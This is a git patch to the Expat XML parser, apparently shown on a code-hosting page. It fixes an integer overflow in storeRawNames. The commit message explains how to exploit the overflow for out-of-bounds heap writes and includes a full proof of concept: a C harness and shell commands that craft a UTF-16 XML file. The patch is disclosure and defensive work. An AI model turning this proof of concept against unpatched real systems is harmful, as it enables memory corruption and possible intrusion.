You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
139 lines
4.8 KiB
139 lines
4.8 KiB
From eb0362808b4f9f1e2345a0cf203b8cc196d776d9 Mon Sep 17 00:00:00 2001 |
|
From: Samanta Navarro <ferivoz@riseup.net> |
|
Date: Tue, 15 Feb 2022 11:55:46 +0000 |
|
Subject: [PATCH] Prevent integer overflow in storeRawNames |
|
|
|
It is possible to use an integer overflow in storeRawNames for out of |
|
boundary heap writes. Default configuration is affected. If compiled |
|
with XML_UNICODE then the attack does not work. Compiling with |
|
-fsanitize=address confirms the following proof of concept. |
|
|
|
The problem can be exploited by abusing the m_buffer expansion logic. |
|
Even though the initial size of m_buffer is a power of two, eventually |
|
it can end up a little bit lower, thus allowing allocations very close |
|
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag |
|
names can be parsed which are almost INT_MAX in size. |
|
|
|
Unfortunately (from an attacker point of view) INT_MAX/2 is also a |
|
limitation in string pools. Having a tag name of INT_MAX/2 characters |
|
or more is not possible. |
|
|
|
Expat can convert between different encodings. UTF-16 documents which |
|
contain only ASCII representable characters are twice as large as their |
|
ASCII encoded counter-parts. |
|
|
|
The proof of concept works by taking these three considerations into |
|
account: |
|
|
|
1. Move the m_buffer size slightly below a power of two by having a |
|
short root node <a>. This allows the m_buffer to grow very close |
|
to INT_MAX. |
|
2. The string pooling forbids tag names longer than or equal to |
|
INT_MAX/2, so keep the attack tag name smaller than that. |
|
3. To be able to still overflow INT_MAX even though the name is |
|
limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag |
|
which only contains ASCII characters. UTF-16 always stores two |
|
bytes per character while the tag name is converted to using only |
|
one. Our attack node byte count must be a bit higher than |
|
2/3 INT_MAX so the converted tag name is around INT_MAX/3 which |
|
in sum can overflow INT_MAX. |
|
|
|
Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes |
|
without running into INT_MAX boundary check. The string pooling is |
|
able to store INT_MAX/3 as tag name because the amount is below |
|
INT_MAX/2 limitation. And creating the sum of both eventually overflows |
|
in storeRawNames. |
|
|
|
Proof of Concept: |
|
|
|
1. Compile expat with -fsanitize=address. |
|
|
|
2. Create Proof of Concept binary which iterates through input |
|
file 16 MB at once for better performance and easier integer |
|
calculations: |
|
|
|
``` |
|
cat > poc.c << EOF |
|
#include <err.h> |
|
#include <expat.h> |
|
#include <stdlib.h> |
|
#include <stdio.h> |
|
|
|
#define CHUNK (16 * 1024 * 1024) |
|
int main(int argc, char *argv[]) { |
|
XML_Parser parser; |
|
FILE *fp; |
|
char *buf; |
|
int i; |
|
|
|
if (argc != 2) |
|
errx(1, "usage: poc file.xml"); |
|
if ((parser = XML_ParserCreate(NULL)) == NULL) |
|
errx(1, "failed to create expat parser"); |
|
if ((fp = fopen(argv[1], "r")) == NULL) { |
|
XML_ParserFree(parser); |
|
err(1, "failed to open file"); |
|
} |
|
if ((buf = malloc(CHUNK)) == NULL) { |
|
fclose(fp); |
|
XML_ParserFree(parser); |
|
err(1, "failed to allocate buffer"); |
|
} |
|
i = 0; |
|
while (fread(buf, CHUNK, 1, fp) == 1) { |
|
printf("iteration %d: XML_Parse returns %d\n", ++i, |
|
XML_Parse(parser, buf, CHUNK, XML_FALSE)); |
|
} |
|
free(buf); |
|
fclose(fp); |
|
XML_ParserFree(parser); |
|
return 0; |
|
} |
|
EOF |
|
gcc -fsanitize=address -lexpat -o poc poc.c |
|
``` |
|
|
|
3. Construct specially prepared UTF-16 XML file: |
|
|
|
``` |
|
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml |
|
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml |
|
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368 |
|
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml |
|
``` |
|
|
|
4. Run proof of concept: |
|
|
|
``` |
|
./poc poc-utf16.xml |
|
``` |
|
--- |
|
expat/lib/xmlparse.c | 7 ++++++- |
|
1 file changed, 6 insertions(+), 1 deletion(-) |
|
|
|
diff --git a/lib/xmlparse.c b/lib/xmlparse.c |
|
index 4b43e613..f34d6ab5 100644 |
|
--- a/lib/xmlparse.c |
|
+++ b/lib/xmlparse.c |
|
@@ -2563,6 +2563,7 @@ storeRawNames(XML_Parser parser) { |
|
while (tag) { |
|
int bufSize; |
|
int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1); |
|
+ size_t rawNameLen; |
|
char *rawNameBuf = tag->buf + nameLen; |
|
/* Stop if already stored. Since m_tagStack is a stack, we can stop |
|
at the first entry that has already been copied; everything |
|
@@ -2574,7 +2575,11 @@ storeRawNames(XML_Parser parser) { |
|
/* For re-use purposes we need to ensure that the |
|
size of tag->buf is a multiple of sizeof(XML_Char). |
|
*/ |
|
- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char)); |
|
+ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char)); |
|
+ /* Detect and prevent integer overflow. */ |
|
+ if (rawNameLen > (size_t)INT_MAX - nameLen) |
|
+ return XML_FALSE; |
|
+ bufSize = nameLen + (int)rawNameLen; |
|
if (bufSize > tag->bufEnd - tag->buf) { |
|
char *temp = (char *)REALLOC(parser, tag->buf, bufSize); |
|
if (temp == NULL) |
|
|
|
|